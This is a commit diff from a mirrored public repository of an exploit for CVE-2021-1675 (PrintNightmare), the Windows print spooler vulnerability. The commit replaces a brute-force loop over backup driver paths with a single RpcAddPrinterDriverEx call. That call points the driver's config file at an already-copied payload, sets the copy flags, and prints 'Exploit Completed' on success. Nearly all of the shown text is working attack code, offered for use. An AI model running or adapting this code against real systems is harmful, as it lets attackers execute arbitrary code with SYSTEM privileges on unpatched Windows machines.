mirror of
https://github.com/cube0x0/CVE-2021-1675.git
synced 2024-12-23 03:06:33 +00:00
Remove brute force backup files
This commit is contained in:
parent
9938ba9075
commit
d6ecf9976e
1 changed files with 8 additions and 12 deletions
|
@ -84,18 +84,14 @@ def main(dce, pDriverPath, share, handle=NULL):
|
||||||
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
||||||
print("[*] Stage0: {0}".format(resp['ErrorCode']))
|
print("[*] Stage0: {0}".format(resp['ErrorCode']))
|
||||||
|
|
||||||
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
|
# Just ask for a new driver with already installed files
|
||||||
for i in range(1, 30):
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
|
||||||
try:
|
flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
|
||||||
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
||||||
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
|
||||||
print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
|
print("[*] Stage1: {0}".format(resp['ErrorCode']))
|
||||||
if (resp['ErrorCode'] == 0):
|
if (resp['ErrorCode'] == 0):
|
||||||
print("[+] Exploit Completed")
|
print("[+] Exploit Completed")
|
||||||
sys.exit()
|
|
||||||
except Exception as e:
|
|
||||||
#print(e)
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
|
|
Loading…
Reference in a new issue